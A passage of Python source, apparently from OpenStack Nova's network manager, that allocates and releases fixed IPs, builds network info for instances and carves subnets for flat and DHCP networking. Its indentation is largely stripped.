table upon startup. If there are networks in the table which do not
have hosts, those will be filled in and have hosts configured
        as the hosts pick them up one at a time during their periodic task.
        The one-at-a-time part is to flatten the layout to help scale.
"""
# If True, this manager requires VIF to create a bridge.
SHOULD_CREATE_BRIDGE = False
# If True, this manager requires VIF to create VLAN tag.
SHOULD_CREATE_VLAN = False
# if True, this manager leverages DHCP
DHCP = False
timeout_fixed_ips = True
def __init__(self, network_driver=None, *args, **kwargs):
if not network_driver:
network_driver = FLAGS.network_driver
self.driver = importutils.import_module(network_driver)
temp = importutils.import_object(FLAGS.instance_dns_manager)
self.instance_dns_manager = temp
self.instance_dns_domain = FLAGS.instance_dns_domain
temp = importutils.import_object(FLAGS.floating_ip_dns_manager)
self.floating_dns_manager = temp
self.network_api = network_api.API()
self.security_group_api = compute_api.SecurityGroupAPI()
self.compute_api = compute_api.API(
security_group_api=self.security_group_api)
        # NOTE(tr3buchet): unless manager subclassing NetworkManager has
# already imported ipam, import nova ipam here
if not hasattr(self, 'ipam'):
self._import_ipam_lib('nova.network.nova_ipam_lib')
l3_lib = kwargs.get("l3_lib", FLAGS.l3_lib)
self.l3driver = importutils.import_object(l3_lib)
super(NetworkManager, self).__init__(service_name='network',
*args, **kwargs)
def _import_ipam_lib(self, ipam_lib):
self.ipam = importutils.import_module(ipam_lib).get_ipam_lib(self)
@utils.synchronized('get_dhcp')
def _get_dhcp_ip(self, context, network_ref, host=None):
"""Get the proper dhcp address to listen on."""
# NOTE(vish): this is for compatibility
if not network_ref.get('multi_host'):
return network_ref['gateway']
if not host:
host = self.host
network_id = network_ref['id']
try:
fip = self.db.fixed_ip_get_by_network_host(context,
network_id,
host)
return fip['address']
except exception.FixedIpNotFoundForNetworkHost:
elevated = context.elevated()
return self.db.fixed_ip_associate_pool(elevated,
network_id,
host=host)
def get_dhcp_leases(self, ctxt, network_ref):
"""Broker the request to the driver to fetch the dhcp leases"""
return self.driver.get_dhcp_leases(ctxt, network_ref)
def init_host(self):
"""Do any initialization that needs to be run if this is a
standalone service.
"""
# NOTE(vish): Set up networks for which this host already has
# an ip address.
ctxt = context.get_admin_context()
for network in self.db.network_get_all_by_host(ctxt, self.host):
self._setup_network_on_host(ctxt, network)
@manager.periodic_task
def _disassociate_stale_fixed_ips(self, context):
if self.timeout_fixed_ips:
now = timeutils.utcnow()
timeout = FLAGS.fixed_ip_disassociate_timeout
time = now - datetime.timedelta(seconds=timeout)
num = self.db.fixed_ip_disassociate_all_by_timeout(context,
self.host,
time)
if num:
LOG.debug(_('Disassociated %s stale fixed ip(s)'), num)
def set_network_host(self, context, network_ref):
"""Safely sets the host of the network."""
LOG.debug(_('setting network host'), context=context)
host = self.db.network_set_host(context,
network_ref['id'],
self.host)
return host
def _do_trigger_security_group_members_refresh_for_instance(self,
instance_id):
# NOTE(francois.charlier): the instance may have been deleted already
# thus enabling `read_deleted`
admin_context = context.get_admin_context(read_deleted='yes')
if utils.is_uuid_like(instance_id):
instance_ref = self.db.instance_get_by_uuid(admin_context,
instance_id)
else:
instance_ref = self.db.instance_get(admin_context, instance_id)
groups = instance_ref['security_groups']
group_ids = [group['id'] for group in groups]
self.security_group_api.trigger_members_refresh(admin_context,
group_ids)
self.security_group_api.trigger_handler('security_group_members',
admin_context, group_ids)
def get_floating_ips_by_fixed_address(self, context, fixed_address):
# NOTE(jkoelker) This is just a stub function. Managers supporting
# floating ips MUST override this or use the Mixin
return []
@wrap_check_policy
def get_instance_uuids_by_ip_filter(self, context, filters):
fixed_ip_filter = filters.get('fixed_ip')
ip_filter = re.compile(str(filters.get('ip')))
ipv6_filter = re.compile(str(filters.get('ip6')))
# NOTE(jkoelker) Should probably figure out a better way to do
# this. But for now it "works", this could suck on
# large installs.
vifs = self.db.virtual_interface_get_all(context)
results = []
for vif in vifs:
if vif['instance_uuid'] is None:
continue
network = self._get_network_by_id(context, vif['network_id'])
fixed_ipv6 = None
if network['cidr_v6'] is not None:
fixed_ipv6 = ipv6.to_global(network['cidr_v6'],
vif['address'],
context.project_id)
if fixed_ipv6 and ipv6_filter.match(fixed_ipv6):
results.append({'instance_uuid': vif['instance_uuid'],
'ip': fixed_ipv6})
vif_id = vif['id']
fixed_ips = self.db.fixed_ips_by_virtual_interface(context,
vif_id)
for fixed_ip in fixed_ips:
if not fixed_ip or not fixed_ip['address']:
continue
if fixed_ip['address'] == fixed_ip_filter:
results.append({'instance_uuid': vif['instance_uuid'],
'ip': fixed_ip['address']})
continue
if ip_filter.match(fixed_ip['address']):
results.append({'instance_uuid': vif['instance_uuid'],
'ip': fixed_ip['address']})
continue
for floating_ip in fixed_ip.get('floating_ips', []):
if not floating_ip or not floating_ip['address']:
continue
if ip_filter.match(floating_ip['address']):
results.append({'instance_uuid': vif['instance_uuid'],
'ip': floating_ip['address']})
continue
return results
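    # Illustrative example (added comment): the filters dict above supports an
    # exact match and two regex matches, e.g.
    #   get_instance_uuids_by_ip_filter(ctxt, {'fixed_ip': '10.0.0.5'})
    #   get_instance_uuids_by_ip_filter(ctxt, {'ip': r'^10\.0\.0\.'})
    #   get_instance_uuids_by_ip_filter(ctxt, {'ip6': r'^fd00:'})
    # Each result entry is {'instance_uuid': ..., 'ip': ...}.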
def _get_networks_for_instance(self, context, instance_id, project_id,
requested_networks=None):
"""Determine & return which networks an instance should connect to."""
# TODO(tr3buchet) maybe this needs to be updated in the future if
# there is a better way to determine which networks
# a non-vlan instance should connect to
if requested_networks is not None and len(requested_networks) != 0:
network_uuids = [uuid for (uuid, fixed_ip) in requested_networks]
networks = self.db.network_get_all_by_uuids(context, network_uuids)
else:
try:
networks = self.db.network_get_all(context)
except exception.NoNetworksFound:
return []
# return only networks which are not vlan networks
return [network for network in networks if
not network['vlan']]
@wrap_check_policy
def allocate_for_instance(self, context, **kwargs):
"""Handles allocating the various network resources for an instance.
rpc.called by network_api
"""
instance_id = kwargs['instance_id']
instance_uuid = kwargs['instance_uuid']
host = kwargs['host']
project_id = kwargs['project_id']
rxtx_factor = kwargs['rxtx_factor']
requested_networks = kwargs.get('requested_networks')
vpn = kwargs['vpn']
admin_context = context.elevated()
LOG.debug(_("network allocations"), instance_uuid=instance_uuid,
context=context)
networks = self._get_networks_for_instance(admin_context,
instance_id, project_id,
requested_networks=requested_networks)
LOG.debug(_('networks retrieved for instance: |%(networks)s|'),
locals(), context=context, instance_uuid=instance_uuid)
self._allocate_mac_addresses(context, instance_uuid, networks)
self._allocate_fixed_ips(admin_context, instance_id,
host, networks, vpn=vpn,
requested_networks=requested_networks)
return self.get_instance_nw_info(context, instance_id, instance_uuid,
rxtx_factor, host)
@wrap_check_policy
def deallocate_for_instance(self, context, **kwargs):
"""Handles deallocating various network resources for an instance.
rpc.called by network_api
kwargs can contain fixed_ips to circumvent another db lookup
"""
# NOTE(francois.charlier): in some cases the instance might be
# deleted before the IPs are released, so we need to get deleted
# instances too
read_deleted_context = context.elevated(read_deleted='yes')
instance_id = kwargs.pop('instance_id')
instance = self.db.instance_get(read_deleted_context, instance_id)
try:
fixed_ips = (kwargs.get('fixed_ips') or
self.db.fixed_ip_get_by_instance(read_deleted_context,
instance['uuid']))
except exception.FixedIpNotFoundForInstance:
fixed_ips = []
LOG.debug(_("network deallocation for instance"), instance=instance,
context=read_deleted_context)
# deallocate fixed ips
for fixed_ip in fixed_ips:
self.deallocate_fixed_ip(context, fixed_ip['address'], **kwargs)
# deallocate vifs (mac addresses)
self.db.virtual_interface_delete_by_instance(read_deleted_context,
instance['uuid'])
@wrap_check_policy
def get_instance_nw_info(self, context, instance_id, instance_uuid,
rxtx_factor, host, **kwargs):
"""Creates network info list for instance.
called by allocate_for_instance and network_api
context needs to be elevated
:returns: network info list [(network,info),(network,info)...]
where network = dict containing pertinent data from a network db object
and info = dict containing pertinent networking data
"""
vifs = self.db.virtual_interface_get_by_instance(context,
instance_uuid)
networks = {}
for vif in vifs:
if vif.get('network_id') is not None:
network = self._get_network_by_id(context, vif['network_id'])
networks[vif['uuid']] = network
nw_info = self.build_network_info_model(context, vifs, networks,
rxtx_factor, host)
return nw_info
def build_network_info_model(self, context, vifs, networks,
rxtx_factor, instance_host):
"""Builds a NetworkInfo object containing all network information
for an instance"""
nw_info = network_model.NetworkInfo()
for vif in vifs:
vif_dict = {'id': vif['uuid'],
'address': vif['address']}
# handle case where vif doesn't have a network
if not networks.get(vif['uuid']):
vif = network_model.VIF(**vif_dict)
nw_info.append(vif)
continue
# get network dict for vif from args and build the subnets
network = networks[vif['uuid']]
subnets = self._get_subnets_from_network(context, network, vif,
instance_host)
# if rxtx_cap data are not set everywhere, set to none
try:
rxtx_cap = network['rxtx_base'] * rxtx_factor
except (TypeError, KeyError):
rxtx_cap = None
# get fixed_ips
v4_IPs = self.ipam.get_v4_ips_by_interface(context,
network['uuid'],
vif['uuid'],
network['project_id'])
v6_IPs = self.ipam.get_v6_ips_by_interface(context,
network['uuid'],
vif['uuid'],
network['project_id'])
# create model FixedIPs from these fixed_ips
network_IPs = [network_model.FixedIP(address=ip_address)
for ip_address in v4_IPs + v6_IPs]
# get floating_ips for each fixed_ip
# add them to the fixed ip
for fixed_ip in network_IPs:
if fixed_ip['version'] == 6:
continue
gfipbfa = self.ipam.get_floating_ips_by_fixed_address
floating_ips = gfipbfa(context, fixed_ip['address'])
floating_ips = [network_model.IP(address=ip['address'],
type='floating')
for ip in floating_ips]
for ip in floating_ips:
fixed_ip.add_floating_ip(ip)
# add ips to subnets they belong to
for subnet in subnets:
subnet['ips'] = [fixed_ip for fixed_ip in network_IPs
if fixed_ip.is_in_subnet(subnet)]
# convert network into a Network model object
network = network_model.Network(**self._get_network_dict(network))
# since network currently has no subnets, easily add them all
network['subnets'] = subnets
# add network and rxtx cap to vif_dict
vif_dict['network'] = network
if rxtx_cap:
vif_dict['rxtx_cap'] = rxtx_cap
# create the vif model and add to network_info
vif = network_model.VIF(**vif_dict)
nw_info.append(vif)
return nw_info
def _get_network_dict(self, network):
"""Returns the dict representing necessary and meta network fields"""
# get generic network fields
network_dict = {'id': network['uuid'],
'bridge': network['bridge'],
'label': network['label'],
'tenant_id': network['project_id']}
# get extra information
if network.get('injected'):
network_dict['injected'] = network['injected']
return network_dict
def _get_subnets_from_network(self, context, network,
vif, instance_host=None):
"""Returns the 1 or 2 possible subnets for a nova network"""
# get subnets
ipam_subnets = self.ipam.get_subnets_by_net_id(context,
network['project_id'], network['uuid'], vif['uuid'])
subnets = []
for subnet in ipam_subnets:
subnet_dict = {'cidr': subnet['cidr'],
'gateway': network_model.IP(
address=subnet['gateway'],
type='gateway')}
# deal with dhcp
if self.DHCP:
if network.get('multi_host'):
dhcp_server = self._get_dhcp_ip(context, network,
instance_host)
else:
dhcp_server = self._get_dhcp_ip(context, subnet)
subnet_dict['dhcp_server'] = dhcp_server
subnet_object = network_model.Subnet(**subnet_dict)
# add dns info
for k in ['dns1', 'dns2']:
if subnet.get(k):
subnet_object.add_dns(
network_model.IP(address=subnet[k], type='dns'))
# get the routes for this subnet
# NOTE(tr3buchet): default route comes from subnet gateway
if subnet.get('id'):
routes = self.ipam.get_routes_by_ip_block(context,
subnet['id'], network['project_id'])
for route in routes:
cidr = netaddr.IPNetwork('%s/%s' % (route['destination'],
route['netmask'])).cidr
subnet_object.add_route(
network_model.Route(cidr=str(cidr),
gateway=network_model.IP(
address=route['gateway'],
type='gateway')))
subnets.append(subnet_object)
return subnets
def _allocate_mac_addresses(self, context, instance_uuid, networks):
"""Generates mac addresses and creates vif rows in db for them."""
for network in networks:
self.add_virtual_interface(context, instance_uuid, network['id'])
def add_virtual_interface(self, context, instance_uuid, network_id):
vif = {'address': utils.generate_mac_address(),
'instance_uuid': instance_uuid,
'network_id': network_id,
'uuid': str(utils.gen_uuid())}
# try FLAG times to create a vif record with a unique mac_address
for i in xrange(FLAGS.create_unique_mac_address_attempts):
try:
return self.db.virtual_interface_create(context, vif)
except exception.VirtualInterfaceCreateException:
vif['address'] = utils.generate_mac_address()
else:
self.db.virtual_interface_delete_by_instance(context,
instance_uuid)
raise exception.VirtualInterfaceMacAddressException()
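    # NOTE (added comment): the for/else above relies on Python's loop-else;
    # the else branch only runs when every attempt raised
    # VirtualInterfaceCreateException (i.e. the loop never returned), in which
    # case the instance's vifs are cleaned up and a MAC address error is raised.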
@wrap_check_policy
def add_fixed_ip_to_instance(self, context, instance_id, host, network_id):
"""Adds a fixed ip to an instance from specified network."""
if utils.is_uuid_like(network_id):
network = self.get_network(context, network_id)
else:
network = self._get_network_by_id(context, network_id)
self._allocate_fixed_ips(context, instance_id, host, [network])
@wrap_check_policy
def remove_fixed_ip_from_instance(self, context, instance_id, host,
address):
"""Removes a fixed ip from an instance from specified network."""
fixed_ips = self.db.fixed_ip_get_by_instance(context, instance_id)
for fixed_ip in fixed_ips:
if fixed_ip['address'] == address:
self.deallocate_fixed_ip(context, address, host)
return
raise exception.FixedIpNotFoundForSpecificInstance(
instance_id=instance_id, ip=address)
def _validate_instance_zone_for_dns_domain(self, context, instance):
instance_zone = instance.get('availability_zone')
if not self.instance_dns_domain:
return True
instance_domain = self.instance_dns_domain
        domainref = self.db.dnsdomain_get(context, instance_domain)
dns_zone = domainref.availability_zone
if dns_zone and (dns_zone != instance_zone):
LOG.warn(_('instance-dns-zone is |%(domain)s|, '
'which is in availability zone |%(zone)s|. '
'Instance is in zone |%(zone2)s|. '
'No DNS record will be created.'),
{'domain': instance_domain,
'zone': dns_zone,
'zone2': instance_zone},
instance=instance)
return False
else:
return True
def allocate_fixed_ip(self, context, instance_id, network, **kwargs):
"""Gets a fixed ip from the pool."""
# TODO(vish): when this is called by compute, we can associate compute
# with a network, or a cluster of computes with a network
# and use that network here with a method like
# network_get_by_compute_host
address = None
instance_ref = self.db.instance_get(context, instance_id)
if network['cidr']:
address = kwargs.get('address', None)
if address:
address = self.db.fixed_ip_associate(context,
address,
instance_ref['uuid'],
network['id'])
else:
address = self.db.fixed_ip_associate_pool(context.elevated(),
network['id'],
instance_ref['uuid'])
self._do_trigger_security_group_members_refresh_for_instance(
instance_id)
get_vif = self.db.virtual_interface_get_by_instance_and_network
vif = get_vif(context, instance_ref['uuid'], network['id'])
values = {'allocated': True,
'virtual_interface_id': vif['id']}
self.db.fixed_ip_update(context, address, values)
name = instance_ref['display_name']
if self._validate_instance_zone_for_dns_domain(context, instance_ref):
uuid = instance_ref['uuid']
self.instance_dns_manager.create_entry(name, address,
"A",
self.instance_dns_domain)
self.instance_dns_manager.create_entry(uuid, address,
"A",
self.instance_dns_domain)
self._setup_network_on_host(context, network)
return address
def deallocate_fixed_ip(self, context, address, **kwargs):
"""Returns a fixed ip to the pool."""
fixed_ip_ref = self.db.fixed_ip_get_by_address(context, address)
vif_id = fixed_ip_ref['virtual_interface_id']
instance = self.db.instance_get_by_uuid(context,
fixed_ip_ref['instance_uuid'])
self._do_trigger_security_group_members_refresh_for_instance(
instance['uuid'])
if self._validate_instance_zone_for_dns_domain(context, instance):
for n in self.instance_dns_manager.get_entries_by_address(address,
self.instance_dns_domain):
self.instance_dns_manager.delete_entry(n,
self.instance_dns_domain)
network = self._get_network_by_id(context, fixed_ip_ref['network_id'])
self._teardown_network_on_host(context, network)
if FLAGS.force_dhcp_release:
dev = self.driver.get_dev(network)
# NOTE(vish): The below errors should never happen, but there may
# be a race condition that is causing them per
# https://code.launchpad.net/bugs/968457, so we log
# an error to help track down the possible race.
msg = _("Unable to release %s because vif doesn't exist.")
if not vif_id:
LOG.error(msg % address)
return
vif = self.db.virtual_interface_get(context, vif_id)
if not vif:
LOG.error(msg % address)
return
# NOTE(vish): This forces a packet so that the release_fixed_ip
# callback will get called by nova-dhcpbridge.
self.driver.release_dhcp(dev, address, vif['address'])
self.db.fixed_ip_update(context, address,
{'allocated': False,
'virtual_interface_id': None})
def lease_fixed_ip(self, context, address):
"""Called by dhcp-bridge when ip is leased."""
LOG.debug(_('Leased IP |%(address)s|'), locals(), context=context)
fixed_ip = self.db.fixed_ip_get_by_address(context, address)
if fixed_ip['instance_uuid'] is None:
msg = _('IP %s leased that is not associated') % address
raise exception.NovaException(msg)
now = timeutils.utcnow()
self.db.fixed_ip_update(context,
fixed_ip['address'],
{'leased': True,
'updated_at': now})
if not fixed_ip['allocated']:
LOG.warn(_('IP |%s| leased that isn\'t allocated'), address,
context=context)
def release_fixed_ip(self, context, address):
"""Called by dhcp-bridge when ip is released."""
LOG.debug(_('Released IP |%(address)s|'), locals(), context=context)
fixed_ip = self.db.fixed_ip_get_by_address(context, address)
if fixed_ip['instance_uuid'] is None:
msg = _('IP %s released that is not associated') % address
raise exception.NovaException(msg)
if not fixed_ip['leased']:
LOG.warn(_('IP %s released that was not leased'), address,
context=context)
self.db.fixed_ip_update(context,
fixed_ip['address'],
{'leased': False})
if not fixed_ip['allocated']:
self.db.fixed_ip_disassociate(context, address)
def create_networks(self, context, label, cidr, multi_host, num_networks,
network_size, cidr_v6, gateway, gateway_v6, bridge,
bridge_interface, dns1=None, dns2=None,
fixed_cidr=None, **kwargs):
"""Create networks based on parameters."""
# NOTE(jkoelker): these are dummy values to make sure iter works
# TODO(tr3buchet): disallow carving up networks
fixed_net_v4 = netaddr.IPNetwork('0/32')
fixed_net_v6 = netaddr.IPNetwork('::0/128')
subnets_v4 = []
subnets_v6 = []
if kwargs.get('ipam'):
if cidr_v6:
subnets_v6 = [netaddr.IPNetwork(cidr_v6)]
if cidr:
subnets_v4 = [netaddr.IPNetwork(cidr)]
else:
subnet_bits = int(math.ceil(math.log(network_size, 2)))
if cidr_v6:
fixed_net_v6 = netaddr.IPNetwork(cidr_v6)
prefixlen_v6 = 128 - subnet_bits
subnets_v6 = fixed_net_v6.subnet(prefixlen_v6,
count=num_networks)
if cidr:
fixed_net_v4 = netaddr.IPNetwork(cidr)
prefixlen_v4 = 32 - subnet_bits
subnets_v4 = list(fixed_net_v4.subnet(prefixlen_v4,
count=num_networks))
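        # Illustrative worked example (added comment): with cidr='10.0.0.0/16',
        # num_networks=4 and network_size=256, subnet_bits = ceil(log2(256)) = 8
        # and prefixlen_v4 = 32 - 8 = 24, so the range is carved into
        # 10.0.0.0/24 ... 10.0.3.0/24.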
if cidr:
# NOTE(jkoelker): This replaces the _validate_cidrs call and
# prevents looping multiple times
try:
nets = self.db.network_get_all(context)
except exception.NoNetworksFound:
nets = []
used_subnets = [netaddr.IPNetwork(net['cidr']) for net in nets]
def find_next(subnet):
next_subnet = subnet.next()
while next_subnet in subnets_v4:
next_subnet = next_subnet.next()
if next_subnet in fixed_net_v4:
return next_subnet
for subnet in list(subnets_v4):
if subnet in used_subnets:
next_subnet = find_next(subnet)
if next_subnet:
subnets_v4.remove(subnet)
subnets_v4.append(next_subnet)
subnet = next_subnet
else:
raise ValueError(_('cidr already in use'))
for used_subnet in used_subnets:
if subnet in used_subnet:
msg = _('requested cidr (%(cidr)s) conflicts with '
'existing supernet (%(super)s)')
raise ValueError(msg % {'cidr': subnet,
'super': used_subnet})
if used_subnet in subnet:
next_subnet = find_next(subnet)
if next_subnet:
subnets_v4.remove(subnet)
subnets_v4.append(next_subnet)
subnet = next_subnet
else:
msg = _('requested cidr (%(cidr)s) conflicts '
'with existing smaller cidr '
'(%(smaller)s)')
raise ValueError(msg % {'cidr': subnet,
'smaller': used_subnet})
networks = []
subnets = itertools.izip_longest(subnets_v4, subnets_v6)
for index, (subnet_v4, subnet_v6) in enumerate(subnets):
net = {}
net['bridge'] = bridge
net['bridge_interface'] = bridge_interface
net['multi_host'] = multi_host
net['dns1'] = dns1
net['dns2'] = dns2
net['project_id'] = kwargs.get('project_id')
if num_networks > 1:
net['label'] = '%s_%d' % (label, index)
else:
net['label'] = label
if cidr and subnet_v4:
net['cidr'] = str(subnet_v4)
net['netmask'] = str(subnet_v4.netmask)
net['gateway'] = gateway or str(subnet_v4[1])
net['broadcast'] = str(subnet_v4.broadcast)
net['dhcp_start'] = str(subnet_v4[2])
if cidr_v6 and subnet_v6:
net['cidr_v6'] = str(subnet_v6)
if gateway_v6:
# use a pre-defined gateway if one is provided
net['gateway_v6'] = str(gateway_v6)
else:
net['gateway_v6'] = str(subnet_v6[1])
net['netmask_v6'] = str(subnet_v6._prefixlen)
if kwargs.get('vpn', False):
# this bit here is for vlan-manager
del net['dns1']
del net['dns2']
vlan = kwargs['vlan_start'] + index
net['vpn_private_address'] = str(subnet_v4[2])
net['dhcp_start'] = str(subnet_v4[3])
net['vlan'] = vlan
net['bridge'] = 'br%s' % vlan
# NOTE(vish): This makes ports unique across the cloud, a more
# robust solution would be to make them uniq per ip
net['vpn_public_port'] = kwargs['vpn_start'] + index
# None if network with cidr or cidr_v6 already exists
network = self.db.network_create_safe(context, net)
if not network:
raise ValueError(_('Network already exists!'))
else:
networks.append(network)
if network and cidr and subnet_v4:
self._create_fixed_ips(context, network['id'], fixed_cidr)
return networks
@wrap_check_policy
def delete_network(self, context, fixed_range, uuid,
require_disassociated=True):
# Prefer uuid but we'll also take cidr for backwards compatibility
elevated = context.elevated()
if uuid:
network = self.db.network_get_by_uuid(elevated, uuid)
elif fixed_range:
network = self.db.network_get_by_cidr(elevated, fixed_range)
if require_disassociated and network.project_id is not None:
raise ValueError(_('Network must be disassociated from project %s'
' before delete') % network.project_id)
self.db.network_delete_safe(context, network.id)
@property
def _bottom_reserved_ips(self): # pylint: disable=R0201
"""Number of reserved ips at the bottom of the range."""
return 2 # network, gateway
@property
def _top_reserved_ips(self): # pylint: disable=R0201
"""Number of reserved ips at the top of the range."""
return 1 # broadcast
def _create_fixed_ips(self, context, network_id, fixed_cidr=None):
"""Create all fixed ips for network."""
network = self._get_network_by_id(context, network_id)
# NOTE(vish): Should these be properties of the network as opposed
# to properties of the manager class?
bottom_reserved = self._bottom_reserved_ips
top_reserved = self._top_reserved_ips
if not fixed_cidr:
fixed_cidr = netaddr.IPNetwork(network['cidr'])
num_ips = len(fixed_cidr)
ips = []
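        # Walk every address in the cidr and flag the reserved ones (network
        # address, gateway, broadcast, plus any extra addresses reserved by
        # subclasses such as the VPN address in VlanManager) so they are never
        # handed out to instances.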
for index in range(num_ips):
address = str(fixed_cidr[index])
if index < bottom_reserved or num_ips - index <= top_reserved:
reserved = True
else:
reserved = False
ips.append({'network_id': network_id,
'address': address,
'reserved': reserved})
self.db.fixed_ip_bulk_create(context, ips)
def _allocate_fixed_ips(self, context, instance_id, host, networks,
**kwargs):
"""Calls allocate_fixed_ip once for each network."""
raise NotImplementedError()
def setup_networks_on_host(self, context, instance_id, host,
teardown=False):
"""calls setup/teardown on network hosts associated with an instance"""
green_pool = greenpool.GreenPool()
if teardown:
call_func = self._teardown_network_on_host
else:
call_func = self._setup_network_on_host
instance = self.db.instance_get(context, instance_id)
vifs = self.db.virtual_interface_get_by_instance(context,
instance['uuid'])
for vif in vifs:
network = self.db.network_get(context, vif['network_id'])
fixed_ips = self.db.fixed_ips_by_virtual_interface(context,
vif['id'])
if not network['multi_host']:
#NOTE (tr3buchet): if using multi_host, host is instance[host]
host = network['host']
if self.host == host or host is None:
# at this point i am the correct host, or host doesn't
# matter -> FlatManager
call_func(context, network)
else:
# i'm not the right host, run call on correct host
topic = rpc.queue_get_for(context, FLAGS.network_topic, host)
args = {'network_id': network['id'], 'teardown': teardown}
# NOTE(tr3buchet): the call is just to wait for completion
green_pool.spawn_n(rpc.call, context, topic,
{'method': 'rpc_setup_network_on_host',
'args': args})
# wait for all of the setups (if any) to finish
green_pool.waitall()
def rpc_setup_network_on_host(self, context, network_id, teardown):
if teardown:
call_func = self._teardown_network_on_host
else:
call_func = self._setup_network_on_host
# subcall from original setup_networks_on_host
network = self.db.network_get(context, network_id)
call_func(context, network)
def _setup_network_on_host(self, context, network):
"""Sets up network on this host."""
raise NotImplementedError()
def _teardown_network_on_host(self, context, network):
"""Sets up network on this host."""
raise NotImplementedError()
@wrap_check_policy
def validate_networks(self, context, networks):
"""check if the networks exists and host
is set to each network.
"""
if networks is None or len(networks) == 0:
return
network_uuids = [uuid for (uuid, fixed_ip) in networks]
self._get_networks_by_uuids(context, network_uuids)
for network_uuid, address in networks:
# check if the fixed IP address is valid and
# it actually belongs to the network
if address is not None:
if not utils.is_valid_ipv4(address):
raise exception.FixedIpInvalid(address=address)
fixed_ip_ref = self.db.fixed_ip_get_by_address(context,
address)
network = self._get_network_by_id(context,
fixed_ip_ref['network_id'])
if network['uuid'] != network_uuid:
raise exception.FixedIpNotFoundForNetwork(
address=address, network_uuid=network_uuid)
if fixed_ip_ref['instance_uuid'] is not None:
raise exception.FixedIpAlreadyInUse(
address=address,
instance_uuid=fixed_ip_ref['instance_uuid'])
def _get_network_by_id(self, context, network_id):
return self.db.network_get(context, network_id)
def _get_networks_by_uuids(self, context, network_uuids):
return self.db.network_get_all_by_uuids(context, network_uuids)
@wrap_check_policy
def get_vifs_by_instance(self, context, instance_id):
"""Returns the vifs associated with an instance"""
instance = self.db.instance_get(context, instance_id)
vifs = self.db.virtual_interface_get_by_instance(context,
instance['uuid'])
return [dict(vif.iteritems()) for vif in vifs]
def get_instance_id_by_floating_address(self, context, address):
"""Returns the instance id a floating ip's fixed ip is allocated to"""
floating_ip = self.db.floating_ip_get_by_address(context, address)
if floating_ip['fixed_ip_id'] is None:
return None
fixed_ip = self.db.fixed_ip_get(context, floating_ip['fixed_ip_id'])
# NOTE(tr3buchet): this can be None
# NOTE(mikal): we need to return the instance id here because its used
# by ec2 (and possibly others)
uuid = fixed_ip['instance_uuid']
if not uuid:
return uuid
instance = self.db.instance_get_by_uuid(context, uuid)
return instance['id']
@wrap_check_policy
def get_network(self, context, network_uuid):
network = self.db.network_get_by_uuid(context.elevated(), network_uuid)
return dict(network.iteritems())
@wrap_check_policy
def get_all_networks(self, context):
try:
networks = self.db.network_get_all(context)
except exception.NoNetworksFound:
return []
return [dict(network.iteritems()) for network in networks]
@wrap_check_policy
def disassociate_network(self, context, network_uuid):
network = self.get_network(context, network_uuid)
self.db.network_disassociate(context, network['id'])
@wrap_check_policy
def get_fixed_ip(self, context, id):
"""Return a fixed ip"""
fixed = self.db.fixed_ip_get(context, id)
return dict(fixed.iteritems())
@wrap_check_policy
def get_fixed_ip_by_address(self, context, address):
fixed = self.db.fixed_ip_get_by_address(context, address)
return dict(fixed.iteritems())
def get_vif_by_mac_address(self, context, mac_address):
"""Returns the vifs record for the mac_address"""
return self.db.virtual_interface_get_by_address(context,
mac_address)
class FlatManager(NetworkManager):
"""Basic network where no vlans are used.
FlatManager does not do any bridge or vlan creation. The user is
responsible for setting up whatever bridges are specified when creating
networks through nova-manage. This bridge needs to be created on all
compute hosts.
The idea is to create a single network for the host with a command like:
nova-manage network create 192.168.0.0/24 1 256. Creating multiple
    networks for one manager is currently not supported, but could be
    added by modifying allocate_fixed_ip and get_network to get a network
with new logic instead of network_get_by_bridge. Arbitrary lists of
addresses in a single network can be accomplished with manual db editing.
If flat_injected is True, the compute host will attempt to inject network
config into the guest. It attempts to modify /etc/network/interfaces and
currently only works on debian based systems. To support a wider range of
OSes, some other method may need to be devised to let the guest know which
ip it should be using so that it can configure itself. Perhaps an attached
disk or serial device with configuration info.
Metadata forwarding must be handled by the gateway, and since nova does
not do any setup in this mode, it must be done manually. Requests to
169.254.169.254 port 80 will need to be forwarded to the api server.
"""
timeout_fixed_ips = False
def _allocate_fixed_ips(self, context, instance_id, host, networks,
**kwargs):
"""Calls allocate_fixed_ip once for each network."""
requested_networks = kwargs.get('requested_networks')
for network in networks:
address = None
if requested_networks is not None:
for address in (fixed_ip for (uuid, fixed_ip) in
requested_networks if network['uuid'] == uuid):
break
self.allocate_fixed_ip(context, instance_id,
network, address=address)
def deallocate_fixed_ip(self, context, address, **kwargs):
"""Returns a fixed ip to the pool."""
super(FlatManager, self).deallocate_fixed_ip(context, address,
**kwargs)
self.db.fixed_ip_disassociate(context, address)
def _setup_network_on_host(self, context, network):
"""Setup Network on this host."""
# NOTE(tr3buchet): this does not need to happen on every ip
# allocation, this functionality makes more sense in create_network
# but we'd have to move the flat_injected flag to compute
net = {}
net['injected'] = FLAGS.flat_injected
self.db.network_update(context, network['id'], net)
def _teardown_network_on_host(self, context, network):
"""Tear down network on this host."""
pass
# NOTE(justinsb): The floating ip functions are stub-implemented.
# We were throwing an exception, but this was messing up horizon.
# Timing makes it difficult to implement floating ips here, in Essex.
@wrap_check_policy
def get_floating_ip(self, context, id):
"""Returns a floating IP as a dict"""
return None
@wrap_check_policy
def get_floating_pools(self, context):
"""Returns list of floating pools"""
return {}
@wrap_check_policy
def get_floating_ip_by_address(self, context, address):
"""Returns a floating IP as a dict"""
return None
@wrap_check_policy
def get_floating_ips_by_project(self, context):
"""Returns the floating IPs allocated to a project"""
return []
@wrap_check_policy
def get_floating_ips_by_fixed_address(self, context, fixed_address):
"""Returns the floating IPs associated with a fixed_address"""
return []
class FlatDHCPManager(RPCAllocateFixedIP, FloatingIP, NetworkManager):
"""Flat networking with dhcp.
FlatDHCPManager will start up one dhcp server to give out addresses.
It never injects network settings into the guest. It also manages bridges.
Otherwise it behaves like FlatManager.
"""
SHOULD_CREATE_BRIDGE = True
DHCP = True
def init_host(self):
"""Do any initialization that needs to be run if this is a
standalone service.
"""
self.l3driver.initialize()
super(FlatDHCPManager, self).init_host()
self.init_host_floating_ips()
def _setup_network_on_host(self, context, network):
"""Sets up network on this host."""
network['dhcp_server'] = self._get_dhcp_ip(context, network)
self.l3driver.initialize_gateway(network)
if not FLAGS.fake_network:
dev = self.driver.get_dev(network)
self.driver.update_dhcp(context, dev, network)
if(FLAGS.use_ipv6):
self.driver.update_ra(context, dev, network)
gateway = utils.get_my_linklocal(dev)
self.db.network_update(context, network['id'],
{'gateway_v6': gateway})
def _teardown_network_on_host(self, context, network):
if not FLAGS.fake_network:
